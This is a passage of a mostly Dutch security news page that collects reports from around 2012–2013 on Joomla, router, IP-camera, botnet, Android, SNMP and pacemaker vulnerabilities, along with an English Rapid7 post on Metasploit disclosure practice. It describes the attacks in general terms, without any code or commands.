    Een andere optie is om IE een waarschuwing te laten geven voordat Active Scripting plaatsvindt of het uitschakelen van Active Scripting in de Internet en lokale intranet beveiligingszones.

    Bron: security.net


  • joomla-logoCooperative Disclosure

    I'm in attendance this year at Rapid7's UNITED Security Summit, and the conversations I'm finding myself in are tending to revolve around vulnerability disclosure. While Metasploit doesn't traffic in zero-day vulnerabilities every day, it happens often enough that we have a disclosure policy that we stick to when we get a hold of newly uncovered vulnerabilities.

    What's not talked about in that disclosure policy is the Metasploit exploit dev community's willingness to help you, the unaffiliated researcher, to build out Metasploit modules that exercise your new awesome bug. While the usual procedure is to put together your module and send us a Pull Request, if you're dealing in undisclosed vulns, you probably don't want to spill the beans before your disclosure is public and the vendor has had a chance to react.

    In those cases, a little more private tutelage might be the thing for you. This week, Juan Vazuquez did just that with contributor Charlie Eriksen and his shiny new Graphite vulnerability. It's pretty easy to put together a private git repo, work out whatever bugs, cleanup, and style tips that are necessary for your module to hit the prime time, and then land it to the main Metasploit distribution once the disclosure parts are done.

    Expressing a new vulnerability as a Metasploit module is more than mere fame and fortune for the exploit dev. Public Metasploit modules are just about the best way today to bring public visibility to your bug. This, in turn, has a nearly magical effect on get patches rolled out or other mitigation in record time, which makes the Internet as a whole a stronger, more resilient, and more useful network.

    So, if you're sitting on some undisclosed vulnerabilities and you're not super sure how to go about turning them into generally useful Metasploit modules, just ask! Both the Rapid7-employed exploit devs and the larger Metasploit community are always happy to help out with some mano-y-mano module writing, and we're pretty good at keeping new, undisclosed vulns off of Twitter (at least, for a little while).

     

    Joomla Bug in the Wild

    Speaking of patching, late last week, Metasploit exploit developer Juan Vazquez wrote up the latest Joomla bug as part of putting together a module to exploit it. I won't rehash it all here, but if you're of the Joomla persuasion, this will hopefully be another example of a public Metasploit module spurring along your own scanning and patching process.

    If you run an enterprise IT shop, you know that Joomla is one of those technologies that has a tendency to pop up in your environment, even if it's not on your explicit whitelist of approved technologies. It's pretty easy to set up and use, so you might be surprised to find it humming along in your environment as people (with all the best intentions!) fire up an instance to run their local knowledge base or internal blog or whatever. And, since those folks aren't running sanctioned and blessed IT-approved software, who knows if they'be been keeping up on their patches. So, along with this latest module, it might be a good time to break out the old Joomla Version scannermodule to tally up what's running.

     

    New Modules

    We've got ten new modules this week, including the new Joomla module mentioned above. Enjoy!

    Exploit modules

    Auxiliary and post modules

     

    Availability

    If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

    For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

    Source: community.rapid7.com

  • joomla-logo

    Een inmiddels gepatcht lek in het populaire contentmanagementsysteem (CMS) Joomla is actief gebruikt om websites over te nemen toen er nog geen beveiligingsupdate voor het probleem beschikbaar was. Beveiligingsbedrijf Verasafe onderzochteen aantal gehackte websites en ontdekte daarbij een onbekende kwetsbaarheid waarmee aanvallers volledige controle over de website kregen.

    De gehackte websites werden vervolgens gebruikt voor phishing, waarmee inloggegevens en creditcardgegevens werden buitgemaakt, en het verspreiden van malware. Het lek werd op 25 juni van dit jaar aan de ontwikkelaars van Joomla! gerapporteerd en zo'n vijf weken later op 31 juli verscheen er een update. Gebruikers krijgen dan ook het advies om naar versies 2.5.14 of 3.1.5 over te stappen.

    Gemeenschap

    Voor gebruikers van het niet meer ondersteunde Joomla 1.5.26 is er dankzij de gebruikersgemeenschap toch een onofficiële update verschenen. Hoeveel websites er via de exploit zijn gehackt is onbekend, maar volgens het beveiligingsbedrijf liepen meer dan een miljoen op Joomla gebaseerde websites risico.

    joomla_vulnerability

    Bron: Security.nl

  • defcon21Vorige week vond in Las Vegas de hackerconferentie Defcon plaats, waar zo'n 15.000 mensen op af kwamen. Daarmee is het de grootste hackerconferentie ter wereld. Dit jaar werd uitvoerig bij onderwerpen als privacy, de NSA en de veiligheid van ingebedde systemen stilgestaan. Tijdens de conferentie werden cd´s met presentaties en audio-opnamen van de lezingen uitgedeeld. Beveiligingsonderzoekster Mila Parkour heeft de cd met presentaties (394MB) nu online gezet voor iedereen die niet aanwezig kon zijn.

    Bijna honderd lezingen, workshops en demonstraties werden tijdens het vier dagen durende evenement gegeven, onder andere door de bekende hacker Charlie Miller die demonstreerde hoe een auto gehackt kan worden. Ook de lezing van Peiter Zatko alias Mudge werd zeer goed ontvangen. Daarnaast was er een kartonnen versie van NSA-klokkenluider Edward Snowden aanwezig en ontbrak ook de traditionele Wall of Sheep niet. Violet Blue maakte voor ZDnet een sfeerimpressie, inclusief foto's.

    bron: Security.nl

     

  • stop-spamEr is een nieuwe spambot ontdekt die duizenden gehackte websites gebruikt om spam te versturen, waaronder ook tientallen Nederlandse sites. De malware wordt door de meeste anti-virusbedrijven Rodecap genoemd en werd op 23 juli voor het eerst ontdekt. Spambots zijn vrij gewoon, maar volgens onderzoeker Roman Huessy valt Rodecap vanwege verschillende eigenschappen op. 

    Ten eerste omdat het www.google.com gebruikt om vanaf besmette computers met de Command & Control (C&C)-server te communiceren. Om het adres van de C&C-server te vinden gebruikt de malware de DNS-gegevens van een ander domein. 

    Spam
    In tegenstelling tot andere spambots die gestolen SMTP-gegevens gebruiken om spam te versturen, de mailserver van besmette internetgebruikers gebruiken of open SMTP-relays misbruiken, past Rodecap een andere methode toe. De malware gebruikt een gigantische lijst van websites die met een PHP-backdoor gecompromitteerd zijn. 

    In een uur tijd wist Huessy meer dan 3500 websites te vinden die een verouderd content management systeem zoals Joomla! draaiden en waar de aanvallers het backdoor-script hadden geplaatst, waarmee ze de webserver waar de website op draait kunnen gebruiken om spam te versturen. 

    Nederlandse websites
    In veel gevallen beschikken webservers over meer rekenkracht en bandbreedte en zijn daardoor interessant voor spammers. In de lijst staan ook 45 domeinen die op .NL eindigen. Een paar .nl domein voorbeelden uit de lijst met bekende joomla lekken:


    Volgens Huessy hebben de makers van de spambot voor een goede tactiek gekozen, aangezien er tienduizenden websites zijn die verouderde CMS-software draaien. "Hierdoor vermijden de criminelen ook gewone blacklists, met name blacklists die dynamische IP-spaces van eindgebruikers bevatten (DSL/kabelabonnees) zoals Spamhaus PBL of SORBS DUL."
  • botnetVerschillende beveiligingsbedrijven zijn een initiatief gestart waarbij internetgebruikers kunnen controleren of hun IP-adres onderdeel van een botnet is. De 'Check and Secure' website is opgezet door Cyscon, Avira en SurfRight en telecomaanbieder Vodafone. Oorspronkelijk is de campagne op de Duitse markt gericht, maar iedereen kan zijn computer laten controleren. 

    De campagne bestaat uit verschillende stappen, waarbij er als eerste naar het IP-adres gekeken wordt of dit geen onderdeel van bekende botnets is. Hiervoor gebruikt de website een actuele dataverzameling die uit zo'n '700.000 botnet-vermeldingen' bestaat en elk kwartier wordt bijgewerkt. 

    Het gaat om IP-adressen die afkomstig zijn van Command & Control (C&C)-servers waarmee botnetbeheerders besmette servers aansturen, maar die door beveiligingsbedrijven zijn overgenomen. 

    Op deze manier kunnen de beveiligingsbedrijven zien welke IP-adressen met de C&C-servers communiceren en dus onderdeel van een botnet zijn. 

    Plug-ins
    Bij de volgende stap wordt er naar geinstalleerde plug-ins gekeken. 83% van alle computerinfecties ter wereld hadden voorkomen kunnen worden als de eindgebruiker zijn browserplug-ins, bijvoorbeeld van Adobe Reader, Java of Flash Player, met de meest recente versie had bijgewerkt, zo stellen de beveiligingsbedrijven. 

    Als laatste wordt het gratis HitmanPro.Alert van het Nederlandse SurfRight aangeboden, onder de noemer 'cyber-vaccinatie', die gebruikers tijdens het internetbankieren tegen banking Trojans beschermt. 

    Deze malware is speciaal ontwikkeld om geld van online bankrekeningen te stelen, maar het programma herkent als dit soort Trojans op de computer actief zijn en waarschuwt vervolgens de gebruiker.

    bron: Security.nl

  • webcamInmiddels zijn er steeds meer mensen die vanwege beveiliging en privacy hun webcam afplakken, maar als het gaat om de installatie van een digitale pleister blijken gebruikers het massaal te laten afweten. Vorige week tijdens de Hack in the Box conferentie in Amsterdam lieten twee onderzoekers zien dat duizenden IP-camera's onnodig openstaan.

    Sergey Shekyan en Artem Harutyunyan van beveiligingsbedrijf Qualys gaven een presentatie over een populaire IP-camera waar verschillende kwetsbaarheden in werden ontdekt. Het gaat om de Foscam Indoor Wireless IP Camera. Een goedkope camera van Chinese makelij, waarvan de hardware en software ook in de IP-camera's van allerlei andere merken worden gebruikt. 

    Aanbieding
    Het onderzoek naar de IP-camera's begon met een kerstaanbieding. Voor minder dan 70 dollar werden de apparaten aangeboden, die naast het weergeven van beelden ook e-mails kunnen versturen en gegevens naar FTP-servers kunnen uploaden. De camera bevat namelijk een ingebedde webserver die voor het internet toegankelijk is. "Toen begonnen we met de camera te spelen en vonden wel veel problemen." 

    De twee onderzoekers ontdekten dat het zeer eenvoudig is om via het internet toegang tot de camera's te krijgen. Het is mogelijk om zonder wachtwoord in te loggen, of het gebruikte wachtwoord te achterhalen. Daarbij is het ook mogelijk voor kwaadwillenden om software op de camera te installeren, zonder dat dit ten koste van de functionaliteit van de camera gaat. 

    De eigenaar van deze apparaten zouden in dit geval niets door hebben. Tijdens hun demonstratie lieten Shekyan en Harutyunyan zien hoe ze een proxy-server op de camera installeerden. "De proxy fungeert als proxy-server voor de aanvaller, maar fungeert als camera voor de eigenaar." 

    Geheugendump
    Via de zoekmachine Shodan en een functionaliteit van de camera's zelf wisten de onderzoekers tussen de 100.000 en 140.000 kwetsbare camera's te vinden. De camera's registreren automatisch een hostname waardoor gebruikers die eenvoudig kunnen benaderen. Hierdoor konden de onderzoekers allerlei kwetsbare camera's achterhalen. 

    Standaard staat er geen wachtwoord op de camera's ingesteld. En zelfs als dit wel is gedaan blijkt dit onvoldoende om pottenkijkers buiten te houden. Een lek in de software maakt het mogelijk om op afstand het geheugen van de camera te 'dumpen', waarin ook de inloggegevens staan. 

    Het opgeven van een bepaalde link is in dit geval voldoende. Daarnaast gaat het niet alleen om het wachtwoord van de camera, maar ook FTP- en e-mail inloggegevens die de gebruiker heeft ingevuld. 

    Populair
    De camera's werden op allerlei locaties aangetroffen, van kinderkamers tot garages. Eén van de camera's was zelfs door een bedrijf opgehangen om het personeel in de gaten te houden. De eigenaar van het bedrijf was echter niet de enige die kon meekijken. 

    "En de camera is zeer populair. Je kunt veel Chinese klonen vinden. Foscam is ook een Chinees bedrijf, maar er zijn dus klonen van het Chinese bedrijf door andere Chinese bedrijven." Er werden minimaal vijf leveranciers gevonden die de camera's aanbieden. Ook in Nederland troffen de onderzoekers de camera aan. 

    Het onderzoek was volgens de twee onderzoekers niet lastig en zou eenvoudig door anderen te herhalen zijn. "Ik zou zeggen dat het verrassend eenvoudig was", zegt Shekyan. "Voor iets dat als een beveiligingsapparaat wordt aangeboden is het belachelijk eenvoudig." 

    Update
    De fabrikant van de webcams werd ingelicht en stuurde de onderzoekers een e-mail dat ze binnenkort benaderd zouden worden, maar het bleef vervolgens stil. Volgens de onderzoekers reageren de fabrikanten van dit soort apparatuur vaak slecht op meldingen over veiligheidsproblemen. 

    Toch is er twee weken geleden nieuwe firmware verschenen waarin het niet meer mogelijk is om de inhoud van de camera te dumpen en zo wachtwoorden te achterhalen. Er werd echter geen enkele camera op internet gevonden die over deze nieuwe firmware beschikt en daardoor beschermd is. 

    Het is namelijk niet mogelijk om de software automatisch te updaten en veel eigenaren hebben geen idee dat er nieuwe firmware beschikbaar is of dat er kwetsbaarheden in de camera aanwezig zijn. 

    Net als met software is het ook belangrijk dat gebruikers niet vergeten hun apparatuur te updaten, zeker als die aan het internet hangt. "Het is niet zo moeilijk, je hoeft alleen een bestand downloaden en dat vervolgens te uploaden via de interface. Twee keer klikken is voldoende", besluit Shekyan.

    Bron: Security.nl

  • Microsoft Directory Services (DS) is nog altijd de meest aangevallen dienst op internet, zo meldt internetgigant Akamai. Het bedrijf brengt elk kwartaal de meest aangevallen poorten in kaart. Microsoft-DS via poort 445 kreeg 29% van het aanvalsverkeer te verduren. Daarmee is de situatie nauwelijks veranderd ten opzichte van het derde kwartaal, toen het nog om 30 procent ging. 

    Wat de aanvallen veroorzaakt laat Akamai niet weten, maar het is bekend dat de Confickerworm zich via deze poort verspreidt. Onlangs kwam Microsoft nog met een rapport waaruit bleek dat 10% van alle besmette bedrijfscomputers door Conficker is geïnfecteerd. 

    Telnet (7,2%) en Microsoft Terminal Services (5,7%) volgen. Tussen het derde en vierde kwartaal van 2012 zijn er nauwelijks grote verschuivingen zichtbaar. Alleen de hoeveelheid aanvalsverkeer over SSL (HTTPS) verdubbelde van 1,1% naar 2,1%.

    China
    Volgens Akamai kwam 41% van al het aanvalsverkeer uit China vandaan, een toename van 8% ten opzichte van het derde kwartaal. De Verenigde Staten en Turkije volgen op afstand met respectievelijk 10% en 4,7%. 

    top 10 attacked ports

  • routerEen Amerikaanse beveiligingsonderzoeker waarschuwt om geen Linksys-routers te gebruiken nadat hij verschillende kwetsbaarheden in de apparatuur ontdekte. Phil Purviance gaf vorig jaar een lezing hoe iemand een internetworm kon ontwerpen die netwerkapparaten zoals routers zou aanvallen en ze vervolgens als botnet inschakelde voor het monitoren van netwerkverkeer. 


    Voor de presentatie demonstreerde Purviance een kwetsbaarheid in de populaire Linksys WRT54GL router. In januari van dit jaar publiceerde Cisco een beveiligingsupdate, maar die patch verhielp alleen een ongerelateerd cross-site scripting-probleem. De onderzoeker merkt op dat we inmiddels een jaar verder zijn en de router nog steeds kwetsbaar voor de Cross-Site File Upload (CSFU)-aanval is. 

    Onveilig
    Purviance stelt dat de router alleen een mechanisme was om zijn aanval te demonstreren. Tijdens het onderzoeksproces analyseerde hij ook andere Linksys-routers, zoals de Linksys EA2700 Network Manager N600 Wi_Fi Wireless-N Router. De onderzoeker had slechts 30 minuten nodig om tot de conclusie te komen dat elk netwerk met de EA2700 router wagenwijd open staat voor hackers. 

    Op 5 maart van dit jaar waarschuwde hij Cisco, maar vanwege de ernst besloot hij een maand later zijn bevindingen te publiceren en zo het publiek te waarschuwen. Het gaat zowel om het Linksys WRT54GL CSFU-lek als vier kwetsbaarheden in de EA2700 router. Vanwege de kwetsbaarheden en reactie van Cisco adviseert Prviance internetgebruikers om geen Linksys-routers te gebruiken. 

    Metasploit
    Op de dag dat Purviance zijn exploits publiceerde verschenen er ook nieuwe Metasploit-modules voor het aanvallen van Linux-routers. Metasploit is een framework waarmee security professionals de veiligheid van systemen en netwerken kunnen testen. 

    De nieuwe Metasploit-modules maken het mogelijk om willekeurige opdrachten op de Netgear DGN2200B, DGN1000B, D-Link DIR-615 en Linksys E1500 en E2500 WiFi-routers uit te voeren. Daardoor is het mogelijk voor een aanvaller om de kwetsbare apparaten over te nemen en bijvoorbeeld netwerkverkeer af te luisteren.

     

  • facebookDe white-hat-hacker Nir Goldshlager heeft een methode ontwikkeld om via Skype en Dropbox toegang te krijgen tot elk Facebook-account dat met een van beide diensten gekoppeld is. Skype en Dropbox hebben de gaten ondertussen gedicht.

    Goldshlager liet aan TechCrunch weten hoe de hack in elkaar steekt. De hack maakt gebruik van open redirect vulnerabilitieswaarvoor zowel dropbox.com als metrics.skype.com gevoelig bleken. Hierbij konden met behulp van het Facebook User ID van een gebruiker die Skype of Dropbox gekoppeld heeft, zowel het e-mailadres en het wachtwoord van het Facebook-account achterhaald worden.

    Door de juiste url, met redirect naar een eigen website, in te toetsen achter het Dropbox- of Skype-domein, kon een hacker de inloggegevens van een Facebook-gebruiker naar zijn eigen domein laten sturen. Zowel Dropbox als Skype bleken niet te valideren naar welk domein de redirect vanaf hun website liep. Skype, Dropbox en Facebook hebben gemeld dat de beveiligingsgaten inmiddels gerepareerd zijn.

    Het is niet de eerste keer dat Goldshlager Facebook hackt. In maart 2013 wist de hacker Facebooks OAuth-authenticatie te omzeilen, nadat hem dat eind februari ook al eens was gelukt. Bij de vorige hack wist Goldshlager ook een kwetsbaarheid in redirects op Facebook uit te buiten.

    Nir Goldshlager is een white-hat-hacker en rapporteert beveiligingsproblemen die hij opspoort bij de websites in kwestie. De hacker staat al twee jaar op de 'bedanklijst' van Facebook vanwege het aantal lekken dat hij heeft opgespoord.

    Bron: Tweakers.net

  • apache_logoMogelijk twintigduizend websites die gehost worden op Apache-servers zijn de afgelopen maanden geïnfecteerd met malware. De toolkit genaamd Darkleech is nog steeds actief en onderzoekers hebben moeite de exacte werking te achterhalen.

    Dit meldt Ars Technica op basis van een rondgang bij verschillende beveiligingsexperts. De eerste meldingen van de malware dateren al van augustus vorig jaar en onder andere het blog van Seagate en de site van The Los Angeles Times werden getroffen. Na besmetting van de Apache-server wordt code in websites op de systemen geïnjecteerd. De browser van bezoekers van die websites, opent vervolgens heimelijk een verbinding met andere websites, die malware serveren.

    Door de complexiteit van het programma is er echter nog steeds veel onduidelijk rondom Darkleech, onderzoekers weten bijvoorbeeld niet hoe de kwaadaardige software zich op servers nestelt. Het zou via kwetsbaarheden in Plesk of Cpanel kunnen gaan, maar ook wordt social engineering, het kraken van wachtwoorden of het uitbuiten van andere kwetsbaarheden niet uitgesloten. Onderzoekers van Cisco troffen bij een analyse de malware aan op meer dan tweeduizend webservers en schatten op basis daarvan, met de voorzichtige aanname dat zo'n server gemiddeld tien sites host, het totaal aantal geïnfecteerde sites op minstens twintigduizend.

    Het onderzoek naar de malware wordt bemoeilijkt doordat niet makkelijk is vast te stellen hoeveel en welke sites er precies geïnfecteerd zijn. Darkleech serveert namelijk niet aan alle bezoekers kwaadaardige links. De malware lijkt ip-adressen te filteren en adressen afkomstig van hostingbedrijven en beveiligingsfirma's zijn geen doelwit. Ook bezoekers die recentelijk het slachtoffer van een aanval waren of op de betreffende website kwamen via specifieke zoekopdrachten lijken niet getroffen te worden. Darkleech is daarnaast in staat om unieke links die het bezoekers serveert, te genereren.

    Het verwijderen van de malware blijkt ook lastig. De malware wijzigt onder andere na besmetting de ssh-binaries op servers. Hierdoor kunnen ze op afstand de authenticatie van de systemen omzeilen en ook bestaande authenticaties onderscheppen. Daarnaast slagen aanvallers er mogelijk in om hun toegang te herstellen na het verwijderen van de kwaadaardige modules via backdoors en rootkits. Overigens is de Darkleech-module zelf niet nieuw: eind september werd hier al melding van gemaakt en toen was de claim al dat de software al twee jaar oud was.

    bron: Tweakers.net

  • Een Duitse beveiligingsexpert gaat de komende twee weken allerlei beveiligingslekken in routers en andere netwerkapparaten voor consumenten onthullen en D-Link, Linksys en Netgear bijten het spits af. Via de kwetsbaarheden kunnen kwaadwillenden op afstand toegang tot de apparaten krijgen. In het geval van D-Link gaat het om de DIR-300 en DIR-600 routers

    Via de kwetsbaarheden kan een aanvaller zonder al teveel moeite willekeurige opdrachten op de apparaten uitvoeren. Daardoor is het mogelijk om de instellingen te wijzigen en het verkeer via een kwaadaardige server te laten lopen. 

    Hiervoor is geen wachtwoord of andere authenticatie vereist. Zelfs in het geval een router niet direct via het internet benaderbaar is, is het mogelijk om de router via Cross-Site Request Forgery aan te vallen. Daarbij wordt de aanval tegen de router vanaf de computer van het slachtoffer uitgevoerd. 

    Het probleem werd op 14 december door onderzoeker Michael Messner ontdekt en aan D-Link gerapporteerd. Een week later reageerde het bedrijf dat het de bevindingen zou verifiëren. 

    Toen bleef het stil en na meerdere pogingen van Messner stelt D-Link dat het een beveiligingsprobleem met de browser betreft en er geen update komt. Ondanks aanvullende informatie om de kwetsbaarheden beter te onderzoeken bleef het daarna stil, waarop Messner tot Full-disclosure overging. 

    Linksys
    In het geval van Linksys gaat het om de Linksys E1500 en E2500. Via een ontbrekende input validatie kan een aanvaller willekeurige shell-opdrachten injecteren. Zo is het mogelijk om Telnet te starten of een backdoor op een kwetsbare router te installeren. Ook is het mogelijk om het huidige wachtwoord te wijzigen zonder dat het ingestelde wachtwoord bekend hoeft te zijn. 

    Het lek werd op 21 oktober aan Linksys gerapporteerd, waarna er een lange mailwisseling tussen de beide partijen volgde. Linksys vroeg Messner om verschillende firmware-versies te testen, maar die bleken toch kwetsbaar te zijn. Er is dan ook nog geen oplossing beschikbaar. 

    Netgear
    Netgear-gebruikers moeten zich zorgen maken in het geval van de N150 Wireless ADSL2+ Modem Router DGN1000B. Wederom is het door ontbrekende input validatie mogelijk willekeurige shell-opdrachten uit te voeren of een backdoor te uploaden. Het probleem werd op 15 oktober vorig jaar gemeld. Na negen dagen kreeg de onderzoeker antwoord, maar een week later werd de melding door Netgear gesloten. 

    Na een moeizame mailwisseling kon Messner uiteindelijk een firmware bètaversie testen. Op 22 januari gaf hij zijn bevindingen door aan Netgear, waarna het stil bleef. Daarom besloot hij vandaag tot openbaarmaking over te gaan. Er is nog altijd geen oplossing voorhanden.

     

    Bron: security.nl

  • botnetCybercriminelen die honderdduizenden systemen in Nederland en Duitsland konden aansturen via het Pobelka-botnet, waren niet alleen inlogdata aan het inzamelen, maar ook informatie over de structuur van interne netwerken. Deze informatie kan ingezet worden voor vervolgaanvallen.

    Dat concluderen SurfRight en Digital Investigation in een onderzoek naar het Citadel-malwareplatform en het Pobelka-botnet dat gebruik maakt van Citadel. Aanleiding voor de research naar de schadelijke software was een malware-aanval via de website van De Telegraaf. De onderzoekers kwamen al snel uit op een command-and-control-server die verder is onderzocht. Daaruit bleek dat het Pobelka-botnet meer dan 264.000 zombies telde die vooral in Nederland en Duitsland waren te vinden. Niet alleen computers van bedrijven waren veelal onopgemerkt besmet geraakt, maar ook veel overheidssystemen.

    Uit een analyse van gestolen data bleek dat de aanvallers met buitgemaakte inloggegevens op webpagina's van onder andere uitgevers konden inloggen om zo kwaadaardige code die naar malware verwees te kunnen plaatsen. Er werden onder andere logingegevens aangetroffen voor systemen van De Telegraaf. Ook via de sites van Weeronline.nl en RTV West werd de afgelopen maanden malware verspreid. Verder werd op de command-and-control-server configuratiedata aangetroffen om geld te stelen bij drie Nederlandse banken: ING, ABN Amro en ASN Bank.

    Volgens Surfright en Digital Investigation had het Pobelka-botnet niet alleen koppelingen met de Dorifel-malware, een virus dat onder andere bij de overheid voor problemen zorgde, maar de criminelen zouden het botnet ook gebruikt hebben om interne netwerken en alle aangesloten apparatuur in kaart te brengen. Deze informatie zou doorverkocht kunnen zijn aan derden, bijvoorbeeld schurkenstaten, zo stellen de schrijvers van het onderzoek. Concreet bewijs wordt daarvoor echter niet aangedragen.

    De Citadel-malware, een compleet malwareplatform dat voor enkele duizenden dollar op de zwarte markt te koop is en van professionele support voorzien kan worden, blijkt vernuftig in elkaar te steken. De malware kan zich goed verstoppen voor vrijwel alle gangbare antivirussoftware en het weet zich in alle bekende browsers te nestelen. Dat cybercriminelen met het op Citadel gebaseerde Pobelka-botnet zo gericht, ongemerkt en op grote schaal in Nederland konden opereren, is volgens de onderzoekers dan ook te danken aan de geraffineerde en professionele wijze waarop de Citadel-malware is opgebouwd.

    bron: tweakers.net

  • Van de 300 miljoen Android-toestellen zijn er 1 miljoen met malware geïnfecteerd, aldus Amerikaanse onderzoekers. Dan Guido, CEO van Trail of Bits en onderzoeker Mike Arpaia lanceerden het Mobile Exploit Intelligence Project, waarbij ze mobiele malware onderzochten. Het onderzoek liep van december 2011 tot maart 2012. In totaal werden zo'n 100 aanvalscampagnes ontdekt. 

    Deze 100 aanvallen werden uitgevoerd door 81 unieke malware-exemplaren. Van deze 81 exemplaren probeerden er slechts 16 root-rechten te krijgen en het toestel volledig over te nemen. "Het verhogen van rechten is de eenvoudigste route voor aanvallers om je gegevens te stelen', laat Guido tegenover BizTechMagazine weten. "En het helpt dat alle code om dat te doen zo goed als gratis kunnen krijgen." 

    Exploits
    Alle aanvallen die de onderzoekers in het wild tegenkwamen gebruikten slechts drie unieke exploits om de kwaadaardige app meer rechten te geven, en alle drie zijn door één enkele auteur gedocumenteerd. 

    Het aantal malware-exemplaren lijkt klein in verhouding met die van andere platformen, zoals Windows. Volgens Guido moet het echter anders worden gezien. "Ons onderzoek heeft aangetoond dat van de 300 miljoen Android-toestellen die er zijn, er op ongeveer een miljoen malware is aangetroffen. Dat is een behoorlijk aantal." 

    Veel Android-toestellen gebruiken nog de oudere Gingerbread-versie van het Android-platform, die al sinds 9 februari 2011 bestaat.

    android malware

    Bron: Security.nl

  • lock_openEen Russisch softwarebedrijf heeft een nieuwe tool gepresenteerd om versleutelde harde schijven toch te kunnen uitlezen. De Elcomsoft Forensic Disk Decryptorbiedt toegang tot informatie op schijven die met BitLocker, PGP en TrueCrypt versleuteld zijn. Naast het uitvoeren van allerlei brute-force aanvallen is de voornaamste methode voor het achterhalen van de encryptiesleutels het uitlezen van geheugendumps. 

    "De voornaamste en enige zwakte van versleutelde containers is de menselijke factor. Naast zwakke wachtwoorden, moeten versleutelde volumes worden aangekoppeld voor de gebruiker om toegang tot de versleutelde gegevens te hebben. Niemand wil elke keer zijn lange, complexe wachtwoorden intikken als ze een bestand willen lezen of schrijven", zegt Vladimir Katalov op het Elcomsoft-blog. 

    Dump
    Volgens het softwarebedrijf zijn de sleutels via geheugendumps te achterhalen. Voor het maken van deze dumps zijn verschillende forensische tools beschikbaar, maar zou ook een FireWire-aanval zijn te gebruiken in het geval de computer is uitgeschakeld. De Disk Decryptor kan namelijk de encryptiesleutels ook uit het hibernation-bestand halen. 

    "Het is belangrijk dat versleutelde volumes zijn aangekoppeld op het moment de geheugendump wordt verkregen of de computer in slaapstand gaat, anders worden de encryptiesleutels vernietigd en kan de inhoud van de versleutelde volumes niet zonder het originele wachtwoord worden ontsleuteld. 

    Snelheid
    Is de geheugendump succesvol, dan kan de Disk Decryptor de versleutelde schijf als een schijfletter op het systeem van de onderzoeker aankoppelen. Daardoor kunnen allerlei andere forensische tools er snel en eenvoudig toegang toe krijgen. 

    "Dit lijkt misschien niet veilig, en mag door bepaald beleid niet worden toegestaan, maar soms is snelheid en gemak alles", stelt Katalov. De Disk Decryptor kost omgerekend 225 euro.

     

    Bron: security.nl

  • De internetverbinding van tienduizenden Nederlandse organisaties, waaronder overheidsinstellingen, zou af te tappen, te beïnvloeden, over te nemen of stil te leggen zijn door verkeerd geconfigureerde snmp-instellingen in routers en modems, stelt beveiligingsbedrijf ITSX.

    ITSX en moederbedrijf Madison Gurkha hebben meer dan de helft van ongeveer 48 miljoen ip-adressen in Nederland gescand op mogelijk kwetsbare snmp-instellingen. Dit protocol, dat al stamt uit 1988, kan worden gebruikt om statistieken op te vragen bij op een netwerk aangesloten apparaten en een klein aantal commando's uit te wisselen. Als het slordig geconfigureerd is, zijn er echter beveiligingsrisico's verbonden aan het inschakelen.

    Zo constateerde ITSX dat via meer dan 13.000 ip-adressen alle instellingen en wachtwoorden uit te lezen waren en bij 2294 de routers compleet over te nemen waren. Volgens Ralph Moonen, directeur van ITSX, is het werkelijke aantal kwetsbare organisaties twee keer zo groot, omdat slechts de helft van de Nederlandse IP-adressen is gescand.

    Moonen claimt tegenover de Volkskrant bedrijven van het internet af te kunnen gooien, pinbetalingen bij kassa's stil te kunnen leggen en antidiefstalpoortjes uit te kunnen schakelen. Zijn bedrijf heeft de belangrijkste organisaties, zoals banken en internetbedrijven, op het probleem gewezen, maar Moonen zegt niet iedereen te kunnen waarschuwen. "In totaal zijn het er zo veel, dat wij onmogelijk iedereen kunnen informeren." Ook het Nationaal Cyber Security Centrum is ingelicht.

    De beveiligingsrisico's van snmp zijn al lang bekend. Onder andere is het protocol kwetsbaar voor aanvallen waarbij gebruik wordt gemaakt van ip-spoofing. In 2004 werd versie 3 van snmp gestandaardiseerd en de wijzigingen bij deze versie waren vooral op beveiliging gericht, maar bij sommige apparaten wordt snmp v3 niet of slechts deels toegepast.

     

    snmp-aanval

     

    Bron: Tweakers.net

  • Pacemakers en geïmplanteerde defibrillatoren zijn kwetsbaar voor draadloze-aanvallen, waardoor tienduizenden mensen kunnen sterven. Daar waarschuwde de bekende beveiligingsonderzoeker Barnaby Jack tijdens de Ruxcon Breakpoint beveiligingsconferentie in het Australische Melbourne. Jack werd wereldwijd bekend toen hij in 2010 liet zien hoe het mogelijk is om geldautomaten te hacken. 


    De onderzoeker heeft zijn werkterrein nu verlegd naar medische apparatuur. Zijn presentatie heette toepasselijk 'Hacking humans'. Hoewel aanvallers via de slecht beveiligde apparaten een 'massamoord' kunnen plegen, is het waarschijnlijkste scenario volgens Jack een aanval op een belangrijk individu. 

    In het ergste geval zou er een worm kunnen worden gemaakt die meerdere apparaten infecteert en zich vervolgens van patiënt naar patiënt verspreidt. 

    Worm
    De worm zou de pacemaker met kwaadaardige code kunnen overschrijven en instellen om een fatale elektriciteitsschok te leveren. Pacemakers beschikken over een draadloze interface die ontworpen is om informatie te verzamelen en het apparaat te beheren. Tijdens de conferentie demonstreerde Jack een aanval op een geïmplanteerde defibrillator. "Er gaat hier 830 volt het hart in." 

    Volgens Jack is het hacken van de apparaten te eenvoudig. "Er wordt niets gedaan om iets te voor een potentiële aanvaller te verbergen." Het grootste probleem is dat de apparaten voor de authenticatie alleen naar de serienummers en apparaatcodes kijken. 

    Het is eenvoudig om deze getallen draadloos te enumereren, om vervolgens toegang tot het apparaat te krijgen en die met kwaadaardige code te herprogrammeren. Begin dit jaar werd er een firewall voor pacemakers aangekondigd, die bepaalde aanvallen moet stoppen.

     

  • win8Beveiligingsonderzoekers hebben naar eigen zeggen een ernstig lek ontdekt in de manier waarop Windows 8 inlogwachtwoorden bewaart. Het probleem zit in twee manieren waarop gebruikers kunnen inloggen; het foto-wachtwoord en de PINcode. Deze twee nieuwe authenticatiemethoden zijn gebaseerd op een normaal gebruikersaccount. Gebruikers maken eerst een normaal account aan en kunnen vervolgens de PIN of wachtwoord-authenticatie kiezen. 

    Zodra de gebruiker de alternatieve authenticatie kiest, wordt zijn tekstwachtwoord via AES versleuteld en in de Vault directory opgeslagen. Deze directory bevat echter alle SIDs en tekstwachtwoorden van alle gebruikers met actieve PIN of wachtwoord-authenticatie. 

